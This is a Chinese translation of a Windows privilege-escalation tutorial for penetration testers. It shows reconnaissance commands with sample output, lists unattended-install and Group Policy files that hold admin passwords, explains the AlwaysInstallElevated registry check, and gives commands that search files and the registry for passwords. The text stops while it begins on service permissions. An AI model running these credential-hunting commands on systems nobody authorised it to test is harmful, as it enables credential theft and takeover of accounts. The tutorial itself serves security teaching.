Windows提權基本原理
前言
沒有多少人談論在Windows下提權,是一件讓人遺憾的事!我想,沒有人這麼做的理由有以下幾點:
- 在滲透測試專案中,客戶需要的驗證就是一個低許可權shell。
- 在演示環境,你經常就會得到管理員帳戶。
- meterpreter使你變得懶惰(getsystem = lazy-fu)。
- 最後的評估報告最終變成 – ->nessus安全認證掃描,微軟安全基線分析….
儘管通常的感覺是,配置得當的windows是安全的。但是事實真的是這樣嗎?因此,讓我們深入瞭解Windows作業系統的黑暗角落,看看我們是否能得到SYSTEM許可權。
應該注意的是,我將使用不同版本的Windows來強調任何可能存在的命令列差異。請牢記這一點,因為不同的作業系統和版本差異會在命令列中顯現。我試圖構造本教程,以便它適用於Windows提權的最普遍的方式。
最後,我想對我的朋友Kostas大聲說,他真的也很喜歡滲透(post-exploitation),你不會想讓他進入到你的計算機的。
【必要文件補充】
- Encyclopaedia Of Windows Privilege Escalation (Brett Moore)
- Windows Attacks: AT is the new black (Chris Gates & Rob Fuller)
- Elevating privileges by exploiting weak folder permissions (Parvez Anwar)
譯者注:原文作者提了下meterpreter,我們可以把meterpreter比做sql注入利用的sqlmap,在得到meterpreter的shell後,可以輸入命令getsystem,自動完成提權。
在t0-t3階段,最初的資訊收集方法
最開始是一個低許可權的shell,這個shell可能是通過遠端程式碼執行,釣魚,反彈得到的。基本上最開始我們對計算機並不瞭解,比如它是做什麼的,有什麼連線,我們有什麼許可權,甚至是什麼作業系統。
在最開始的階段,我們得快速收集一些基本資訊來評估我們的環境。
作業系統
第一步,讓我們找到我們連線的作業系統。
C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
主機名+當前使用者
接下來,我們看到這臺計算機的主機名和我們連線上是哪個使用者
C:\Windows\system32> hostname
b33f
C:\Windows\system32> echo %username%
user1
所用使用者資訊+當前使用者所在的組
現在我們有了一些基本資訊,然後我們列出了其他使用者帳戶,並在更詳細的情況下檢視我們自己的使用者資訊。我們已經看到user1不是本地組管理員。
C:\Windows\system32> net users
User accounts for \\B33F
-------------------------------------------------------------------------------
Administrator b33f Guest
user1
The command completed successfully.
C:\Windows\system32> net user user1
User name user1
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/11/2014 7:47:14 PM
Password expires Never
Password changeable 1/11/2014 7:47:14 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/11/2014 8:05:09 PM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
網路介面+路由表這就是我們目前需要了解的關於使用者和許可權的全部內容。接下來我們要討論的是網路資訊,連線的裝置是什麼,以及它對這些連線施加了什麼規則。
首先讓我們看一下可用的網路介面和路由表。
C:\Windows\system32> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : b33f
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
Physical Address. . . . . . . . . : 0C-84-DC-62-60-29
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-56-79-35
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::5cd4:9caf:61c0:ba6e%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.0.104(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Saturday, January 11, 2014 3:53:55 PM
Lease Expires . . . . . . . . . . : Sunday, January 12, 2014 3:53:55 PM
Default Gateway . . . . . . . . . : 192.168.0.1
DHCP Server . . . . . . . . . . . : 192.168.0.1
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-18-14-24-1D-00-0C-29-56-79-35
DNS Servers . . . . . . . . . . . : 192.168.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
C:\Windows\system32> route print
===========================================================================
Interface List
18...0c 84 dc 62 60 29 ......Bluetooth Device (Personal Area Network)
13...00 ff 0c 0d 4f ed ......TAP-Windows Adapter V9
11...00 0c 29 56 79 35 ......Intel(R) PRO/1000 MT Network Connection
1...........................Software Loopback Interface 1
16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
19...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
14...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.104 10
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
192.168.0.0 255.255.255.0 On-link 192.168.0.104 266
192.168.0.104 255.255.255.255 On-link 192.168.0.104 266
192.168.0.255 255.255.255.255 On-link 192.168.0.104 266
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 192.168.0.104 266
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 192.168.0.104 266
===========================================================================
Persistent Routes:
None
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
14 58 ::/0 On-link
1 306 ::1/128 On-link
14 58 2001::/32 On-link
14 306 2001:0:5ef5:79fb:8d2:b4e:3f57:ff97/128
On-link
11 266 fe80::/64 On-link
14 306 fe80::/64 On-link
14 306 fe80::8d2:b4e:3f57:ff97/128
On-link
11 266 fe80::5cd4:9caf:61c0:ba6e/128
On-link
1 306 ff00::/8 On-link
14 306 ff00::/8 On-link
11 266 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
Arp快取表arp -A顯示了所有可用介面的arp(地址解析協議)快取表。
C:\Windows\system32> arp -A
Interface: 192.168.0.104 --- 0xb
Internet Address Physical Address Type
192.168.0.1 90-94-e4-c5-b0-46 dynamic
192.168.0.101 ac-22-0b-af-bb-43 dynamic
192.168.0.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
這就使我們瞭解了活動網路連線和防火牆規則。
C:\Windows\system32> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 684
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:5354 0.0.0.0:0 LISTENING 1400
TCP 192.168.0.104:139 0.0.0.0:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 684
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5357 [::]:0 LISTENING 4
UDP 0.0.0.0:5355 *:* 1100
UDP 0.0.0.0:52282 *:* 976
UDP 0.0.0.0:55202 *:* 2956
UDP 0.0.0.0:59797 *:* 1400
UDP 127.0.0.1:1900 *:* 2956
UDP 127.0.0.1:65435 *:* 2956
UDP 192.168.0.104:137 *:* 4
UDP 192.168.0.104:138 *:* 4
UDP 192.168.0.104:1900 *:* 2956
UDP 192.168.0.104:5353 *:* 1400
UDP 192.168.0.104:65434 *:* 2956
UDP [::]:5355 *:* 1100
UDP [::]:52281 *:* 976
UDP [::]:52283 *:* 976
UDP [::]:55203 *:* 2956
UDP [::]:59798 *:* 1400
UDP [::1]:1900 *:* 2956
UDP [::1]:5353 *:* 1400
UDP [::1]:65433 *:* 2956
UDP [fe80::5cd4:9caf:61c0:ba6e%11]:1900 *:* 2956
UDP [fe80::5cd4:9caf:61c0:ba6e%11]:65432 *:* 2956
檢視防火牆轉態+防火牆配置資訊
以下兩個netsh命令是在不同作業系統的命令示例。netsh firewall命令只能從XP SP2和以上版本執行。
C:\Windows\system32> netsh firewall show state
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Firewall
Remote admin mode = Disable
Ports currently open on all network interfaces:
Port Protocol Version Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.
C:\Windows\system32> netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Enable Inbound COMRaider / E:\comraider\comraider.exe
Enable Inbound nc.exe / C:\users\b33f\desktop\nc.exe
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
檢視 程式+服務+計劃任務+驅動程式
最後,我們將簡要地看一下在這個裝置上執行的有什麼,比如計劃任務、執行程式、啟動服務和安裝的驅動程式。
這將顯示所有排程任務的詳細輸出,下面您可以看到單個任務的示例輸出。
C:\Windows\system32> schtasks /query /fo LIST /v
Folder: \Microsoft\Windows Defender
HostName: B33F
TaskName: \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time: 1/22/2014 5:11:13 AM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob
-WinTask -RestrictPrivilegesScan
Start In: N/A
Comment: Scheduled Scan
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 5:11:13 AM
Start Date: 1/1/2000
End Date: 1/1/2100
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
[..Snip..]
# tasklist命令顯示了正在執行的程式以及啟動服務。
程式+服務C:\Windows\system32> tasklist /SVC
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 244 N/A
csrss.exe 332 N/A
csrss.exe 372 N/A
wininit.exe 380 N/A
winlogon.exe 428 N/A
services.exe 476 N/A
lsass.exe 484 SamSs
lsm.exe 496 N/A
svchost.exe 588 DcomLaunch, PlugPlay, Power
svchost.exe 668 RpcEptMapper, RpcSs
svchost.exe 760 Audiosrv, Dhcp, eventlog,
HomeGroupProvider, lmhosts, wscsvc
svchost.exe 800 AudioEndpointBuilder, CscService, Netman,
SysMain, TrkWks, UxSms, WdiSystemHost,
wudfsvc
svchost.exe 836 AeLookupSvc, BITS, gpsvc, iphlpsvc,
LanmanServer, MMCSS, ProfSvc, Schedule,
seclogon, SENS, ShellHWDetection, Themes,
Winmgmt, wuauserv
audiodg.exe 916 N/A
svchost.exe 992 EventSystem, fdPHost, netprofm, nsi,
WdiServiceHost, WinHttpAutoProxySvc
svchost.exe 1104 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc
spoolsv.exe 1244 Spooler
svchost.exe 1272 BFE, DPS, MpsSvc
mDNSResponder.exe 1400 Bonjour Service
taskhost.exe 1504 N/A
taskeng.exe 1556 N/A
vmtoolsd.exe 1580 VMTools
dwm.exe 1660 N/A
explorer.exe 1668 N/A
vmware-usbarbitrator.exe 1768 VMUSBArbService
TPAutoConnSvc.exe 1712 TPAutoConnSvc
[..Snip..]
C:\Windows\system32> net start
These Windows services are started:
Application Experience
Application Information
Background Intelligent Transfer Service
Base Filtering Engine
Bluetooth Support Service
Bonjour Service
COM+ Event System
COM+ System Application
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Diagnostic System Host
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Function Discovery Provider Host
Function Discovery Resource Publication
Group Policy Client
[..Snip..]
# DRIVERQUERY有時是有用的,因為一些第三方驅動,即使是信譽良好的公司,也比瑞士乳酪上的洞多。這是可能的,因為ring0的利用是在大多數人的專長技能之外。
驅動資訊
C:\Windows\system32> DRIVERQUERY
Module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
1394ohci 1394 OHCI Compliant Ho Kernel 11/20/2010 6:01:11 PM
ACPI Microsoft ACPI Driver Kernel 11/20/2010 4:37:52 PM
AcpiPmi ACPI Power Meter Drive Kernel 11/20/2010 4:47:55 PM
adp94xx adp94xx Kernel 12/6/2008 7:59:55 AM
adpahci adpahci Kernel 5/2/2007 1:29:26 AM
adpu320 adpu320 Kernel 2/28/2007 8:03:08 AM
AFD Ancillary Function Dri Kernel 11/20/2010 4:40:00 PM
agp440 Intel AGP Bus Filter Kernel 7/14/2009 7:25:36 AM
aic78xx aic78xx Kernel 4/12/2006 8:20:11 AM
aliide aliide Kernel 7/14/2009 7:11:17 AM
amdagp AMD AGP Bus Filter Dri Kernel 7/14/2009 7:25:36 AM
amdide amdide Kernel 7/14/2009 7:11:19 AM
AmdK8 AMD K8 Processor Drive Kernel 7/14/2009 7:11:03 AM
AmdPPM AMD Processor Driver Kernel 7/14/2009 7:11:03 AM
amdsata amdsata Kernel 3/19/2010 9:08:27 AM
amdsbs amdsbs Kernel 3/21/2009 2:35:26 AM
amdxata amdxata Kernel 3/20/2010 12:19:01 AM
AppID AppID Driver Kernel 11/20/2010 5:29:48 PM
arc arc Kernel 5/25/2007 5:31:06 AM
[..Snip..]
在t4階段,神祕藝術之WMIC
我想提下WMIC (Windows Management Instrumentation Command-Line,Windows管理工具命令列),因為它是Windows最有用的命令列工具。WMIC對於資訊收集和滲透都是非常實用的而且輸出內容有很多值得期待的地方。全面解釋WMIC的使用將需要一個教程。補充一點,由於格式化的問題,WMIC有些輸出將很難顯示。
我將會在下面列出兩個文章,這兩個文章對於WMIC是非常值得閱讀的。
- Command-Line Ninjitsu (SynJunkie)
- Windows WMIC Command Line (ComputerHope)
糟糕的是,一些預設配置的windows並不允許訪問WMIC,除非是使用者在windows的管理組,從我的虛擬機器測試來看,任何版本的windows xp的低許可權使用者並不能訪問WMIC。相反的,預設配置的windows 7 專業版和windows 8 企業版允許低許可權的使用者訪問WMIC並查詢作業系統版本。這正是我們所需要的,因為我們正在使用WMIC來收集關於目標機的資訊。
關於WMIC的選項,我已經列出了下面可用的命令列。
C:\Windows\system32> wmic /?
[global switches]
The following global switches are available:
/NAMESPACE Path for the namespace the alias operate against.
/ROLE Path for the role containing the alias definitions.
/NODE Servers the alias will operate against.
/IMPLEVEL Client impersonation level.
/AUTHLEVEL Client authentication level.
/LOCALE Language id the client should use.
/PRIVILEGES Enable or disable all privileges.
/TRACE Outputs debugging information to stderr.
/RECORD Logs all input commands and output.
/INTERACTIVE Sets or resets the interactive mode.
/FAILFAST Sets or resets the FailFast mode.
/USER User to be used during the session.
/PASSWORD Password to be used for session login.
/OUTPUT Specifies the mode for output redirection.
/APPEND Specifies the mode for output redirection.
/AGGREGATE Sets or resets aggregate mode.
/AUTHORITY Specifies the for the connection.
/?[:<BRIEF|FULL>] Usage information.
For more information on a specific global switch, type: switch-name /?
The following alias/es are available in the current role:
ALIAS - Access to the aliases available on the local system
BASEBOARD - Base board (also known as a motherboard or system board) management.
BIOS - Basic input/output services (BIOS) management.
BOOTCONFIG - Boot configuration management.
CDROM - CD-ROM management.
COMPUTERSYSTEM - Computer system management.
CPU - CPU management.
CSPRODUCT - Computer system product information from SMBIOS.
DATAFILE - DataFile Management.
DCOMAPP - DCOM Application management.
DESKTOP - User's Desktop management.
DESKTOPMONITOR - Desktop Monitor management.
DEVICEMEMORYADDRESS - Device memory addresses management.
DISKDRIVE - Physical disk drive management.
DISKQUOTA - Disk space usage for NTFS volumes.
DMACHANNEL - Direct memory access (DMA) channel management.
ENVIRONMENT - System environment settings management.
FSDIR - Filesystem directory entry management.
GROUP - Group account management.
IDECONTROLLER - IDE Controller management.
IRQ - Interrupt request line (IRQ) management.
JOB - Provides access to the jobs scheduled using the schedule service.
LOADORDER - Management of system services that define execution dependencies.
LOGICALDISK - Local storage device management.
LOGON - LOGON Sessions.
MEMCACHE - Cache memory management.
MEMORYCHIP - Memory chip information.
MEMPHYSICAL - Computer system's physical memory management.
NETCLIENT - Network Client management.
NETLOGIN - Network login information (of a particular user) management.
NETPROTOCOL - Protocols (and their network characteristics) management.
NETUSE - Active network connection management.
NIC - Network Interface Controller (NIC) management.
NICCONFIG - Network adapter management.
NTDOMAIN - NT Domain management.
NTEVENT - Entries in the NT Event Log.
NTEVENTLOG - NT eventlog file management.
ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
OS - Installed Operating System/s management.
PAGEFILE - Virtual memory file swapping management.
PAGEFILESET - Page file settings management.
PARTITION - Management of partitioned areas of a physical disk.
PORT - I/O port management.
PORTCONNECTOR - Physical connection ports management.
PRINTER - Printer device management.
PRINTERCONFIG - Printer device configuration management.
PRINTJOB - Print job management.
PROCESS - Process management.
PRODUCT - Installation package task management.
QFE - Quick Fix Engineering.
QUOTASETTING - Setting information for disk quotas on a volume.
RDACCOUNT - Remote Desktop connection permission management.
RDNIC - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
RDTOGGLE - Turning Remote Desktop listener on or off remotely.
RECOVEROS - Information that will be gathered from memory when the operating system fails.
REGISTRY - Computer system registry management.
SCSICONTROLLER - SCSI Controller management.
SERVER - Server information management.
SERVICE - Service application management.
SHADOWCOPY - Shadow copy management.
SHADOWSTORAGE - Shadow copy storage area management.
SHARE - Shared resource management.
SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
SOUNDDEV - Sound Device management.
STARTUP - Management of commands that run automatically when users log onto the computer
system.
SYSACCOUNT - System account management.
SYSDRIVER - Management of the system driver for a base service.
SYSTEMENCLOSURE - Physical system enclosure management.
SYSTEMSLOT - Management of physical connection points including ports, slots and
peripherals, and proprietary connections points.
TAPEDRIVE - Tape drive management.
TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
TIMEZONE - Time zone data management.
UPS - Uninterruptible power supply (UPS) management.
USERACCOUNT - User account management.
VOLTAGE - Voltage sensor (electronic voltmeter) data management.
VOLUME - Local storage volume management.
VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
VOLUMEUSERQUOTA - Per user storage volume quota management.
WMISET - WMI service operational parameters management.
For more information on a specific alias, type: alias /?
CLASS - Escapes to full WMI schema.
PATH - Escapes to full WMI object paths.
CONTEXT - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.
For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?
為了簡化操作,我已經建立了一個指令碼,可以在目標機器上使用WMIC提取以下資訊:流程、服務、使用者帳號、使用者組、網路介面、硬碟資訊、網路共享資訊、安裝Windows補丁、程式在啟動執行、安裝的軟體列表、作業系統、時區資訊。
我已經通過各種標誌和引數來提取有價值的資訊,如果有人想要新增到列表中,請在下面留下評論。使用內建的輸出特性,指令碼將把所有結果寫入一個人類可讀的html檔案。
指令碼地址:http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar
輸出頁面:http://www.fuzzysecurity.com/tutorials/files/Win7.html
在t5-t6階段,快速攻陷
在繼續滲透之前,你需要先回顧一下已經蒐集到的資訊,資訊量應該已經不小了。我們計劃的下一步就是要尋找一些能被輕易利用的系統缺陷來提升許可權。
顯而易見,第一步就是去檢視補丁修正情況。如果發現主機已經被打了某些補丁,也不用很擔心。我的 WMIC 指令碼可以列出所有已安裝的補丁,你可以通過下面這條命令來檢視:
檢視補丁資訊
C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption Description HotFixID InstalledOn
http://support.microsoft.com/?kbid=2727528 Security Update KB2727528 11/23/2013
http://support.microsoft.com/?kbid=2729462 Security Update KB2729462 11/26/2013
http://support.microsoft.com/?kbid=2736693 Security Update KB2736693 11/26/2013
http://support.microsoft.com/?kbid=2737084 Security Update KB2737084 11/23/2013
http://support.microsoft.com/?kbid=2742614 Security Update KB2742614 11/23/2013
http://support.microsoft.com/?kbid=2742616 Security Update KB2742616 11/26/2013
http://support.microsoft.com/?kbid=2750149 Update KB2750149 11/23/2013
http://support.microsoft.com/?kbid=2756872 Update KB2756872 11/24/2013
http://support.microsoft.com/?kbid=2756923 Security Update KB2756923 11/26/2013
http://support.microsoft.com/?kbid=2757638 Security Update KB2757638 11/23/2013
http://support.microsoft.com/?kbid=2758246 Update KB2758246 11/24/2013
http://support.microsoft.com/?kbid=2761094 Update KB2761094 11/24/2013
http://support.microsoft.com/?kbid=2764870 Update KB2764870 11/24/2013
http://support.microsoft.com/?kbid=2768703 Update KB2768703 11/23/2013
http://support.microsoft.com/?kbid=2769034 Update KB2769034 11/23/2013
http://support.microsoft.com/?kbid=2769165 Update KB2769165 11/23/2013
http://support.microsoft.com/?kbid=2769166 Update KB2769166 11/26/2013
http://support.microsoft.com/?kbid=2770660 Security Update KB2770660 11/23/2013
http://support.microsoft.com/?kbid=2770917 Update KB2770917 11/24/2013
http://support.microsoft.com/?kbid=2771821 Update KB2771821 11/24/2013
[..Snip..]
但這些輸出並不代表一定可以被利用,最好的策略先是去尋找可以提升許可權的 EXP 以及它們的補丁編號。這些 EXP 包括但不限於:KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)。在列舉了系統版本和補丁包後,你應該發現哪些許可權提升漏洞可以被複現,使用補丁包編號你可以過濾掉那些已經被安裝的補丁,檢查一下是否有被漏打的補丁。補丁包過濾
以下是對補丁包進行過濾的語法
C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
接下來我們將會有很多新發現。一般情況下,如果需要給很多機器配置同一個環境,一個技術人員一定不會逐個安裝配置這些機器,而是會選擇一些自動化安裝的解決方案。這些方案是什麼以及它們是如何工作的與我們當下所做的事不是很相關,重要的是他們留下的用於安裝流程的配置檔案,這些配置檔案包含大量的敏感資訊,例如作業系統的產品金鑰和管理員密碼。而我們最最感興趣的就是管理員密碼,因為我們可以藉此來提升我們的許可權。以下是一些經常被用於存放配置檔案的位置(當然檢查整個系統也是可以的)
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
這些目錄中的檔案可能包含著明文密碼,或是Base64加密後的密碼。下面是一些檔案中的樣例:# This is a sample from sysprep.inf with clear-text credentials.
[GuiUnattended]
OEMSkipRegional=1
OemSkipWelcome=1
AdminPassword=s3cr3tp4ssw0rd
TimeZone=20
# This is a sample from sysprep.xml with Base64 "encoded" credentials. Please people Base64 is not encryption, I take more precautions to protect my coffee. The password here is "SuperSecurePassword".
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>
<Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>
<PlainText>false</PlainText>
</Password>
<Description>Local Administrator</Description>
<DisplayName>Administrator</DisplayName>
<Group>Administrators</Group>
<Name>Administrator</Name>
</LocalAccount>
</LocalAccounts>
# Sample from Unattended.xml with the same "secure" Base64 encoding.
<AutoLogon>
<Password>
<Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>
<PlainText>false</PlainText>
</Password>
<Enabled>true</Enabled>
<Username>Administrator</Username>
</AutoLogon>
在 Ben Campbell (@Meatballs__) 的推薦下,我將獲取組策略首選項 ( Group Policy Preferences ) 儲存的密碼也作為快速攻陷目標機器的方式之一。組策略首選項檔案可以被用於去建立域內主機的本地使用者。如果你控制的機器被連線到一個域內,那麼去查詢一下儲存在 SYSVOL 中的 Groups.xml 檔案也是很有意義的,而且所有被授權的使用者都有該檔案的讀許可權。在這個 xml 檔案中的密碼只是被臨時使用者“模糊”地用 AES 加密了,說“模糊”是因為靜態金鑰已經被公開的公佈於 msdn 網站上,所以可以輕鬆地破解這些密碼。
除了 Groups.xml 還有幾個其他的策略首選項檔案也同樣含有可選的 “cPassword” 屬性:
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
這個漏洞可以通過手動瀏覽 SYSVOL 資料夾和抓取相關檔案來利用,證明如下
然而,我們都希望有一個自動化的解決方案,這樣我們就可以儘可能快的完成這項工作。這裡主要有兩種方式,取決於我們的 shell 型別以及許可權大小,
- (1) 一個是通過已建立的會話執行 metasploit 模組
- (2) 你可以使用 PowerSploit 的 Get-GPPPassword 功能。PowerSploit 是一個強大的 powershell 框架,作者是 Matt Graeber(擅長逆向工程、計算機取證以及滲透測試)。
接下來我們要查詢一個奇怪的登錄檔設定項 “AlwaysInstallElevated”,如果該設定項被啟用,它會允許任何許可權的使用者以 NT AUTHORITY\SYSTEM 許可權來安裝 *.msi 檔案。可以建立低許可權的使用者(它們的作業系統使用受到限制)但是卻給它們 SYSTEM 許可權去安裝軟體,這在我看來是有些奇怪。想要閱讀更多的這方面的背景知識,可以檢視這裡 ,這是在 GreyHatHacker 部落格上 Parvez 的一篇文章,他最早報告了這個安全問題。
為了能利用這個漏洞,我們需要去檢查兩個登錄檔鍵值是否被設定,這是我們是否能彈出 SYSTEM 許可權 shell 的關鍵。以下是查詢對應登錄檔鍵值的語法
# 只有當登錄檔項中存在鍵值 "AlwaysInstallElevated" 且其 DWORD 值為1時才會有效
C:\Windows\system32> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
C:\Windows\system32> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
為了完成這個章節,我們還將在作業系統上做一些快速搜尋,希望我們可以成功。執行以下語句完成搜尋
# The command below will search the file system for file names containing certain keywords. You canspecify as many keywords as you wish.
# 這條語句可以搜尋指定含有任意多關鍵字的檔名
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
# Search certain file types for a keyword, this can generate a lot of output.
# 用關鍵詞搜尋精確的檔案型別,這個操作可能造成大量的輸出
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
# 以下兩個命令被用於查詢帶有關鍵詞的登錄檔項,樣例中查詢的關鍵詞是 "password"
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
在t7-t10階段,擼起袖子加油幹
希望到現在為止,我們已經有了一個 SYSTEM shell,但如果我們還沒有,接下來還有一些攻擊方法可以嘗試。在最後章節我們將會關注於 Windows 服務和檔案/目錄許可權部分。我們的目標是去使用低許可權去提升當前會話許可權。
我們將會檢查很多訪問許可權,所以我們應該抓取一份微軟 Sysinternals 套件中 accesschk.exe 工具的副本。微軟 Sysinternals 套件包含了許多強大的工具,但微軟並沒有把它們加入標準版的 Windows。你可以從 微軟 technet 網站下載該套件
我們將會先從 Windows 開啟的服務來尋找線索,因為那裡可以發現很多快速制勝的方法。通常來說,現代作業系統不會包含存在漏洞的服務。在這種情況下,漏洞指的是我們可以重新配置的服務引數。Windows 服務有點像應用程式的快捷鍵,下面是一個例子
# We can use sc to query, configure and manage windows services.
# 我們可以使用 sc 去查詢、配置、管理 Windows 服務
C:\Windows\system32> sc qc Spooler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spoolsv.exe
LOAD_ORDER_GROUP : SpoolerGroup
TAG : 0
DISPLAY_NAME : Print Spooler
DEPENDENCIES : RPCSS
: http
SERVICE_START_NAME : LocalSystem
我們可以使用 accesschk 檢查每一個服務的許可權# We can see the permissions that each user level has, you can also use "accesschk.exe -ucqv *" to list all services.
C:\> accesschk.exe -ucqv Spooler
Spooler
R NT AUTHORITY\Authenticated Users
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
